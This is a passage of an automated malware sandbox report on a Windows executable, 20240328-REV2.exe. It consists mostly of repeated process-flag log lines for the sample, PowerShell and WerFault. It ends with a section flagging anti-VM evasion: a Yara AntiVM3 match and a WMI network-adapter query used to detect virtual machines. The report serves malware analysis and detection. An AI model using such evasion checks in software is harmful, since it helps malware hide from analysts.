                        Source: C:\Users\user\Desktop\20240328-REV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                        Malware Analysis System Evasion

                        barindex
                        Yara detected AntiVM3
                        Source: Yara matchFile source: Process Memory Space: 20240328-REV2.exe PID: 6840, type: MEMORYSTR
                        Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                        Source: C:\Users\user\Desktop\20240328-REV2.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
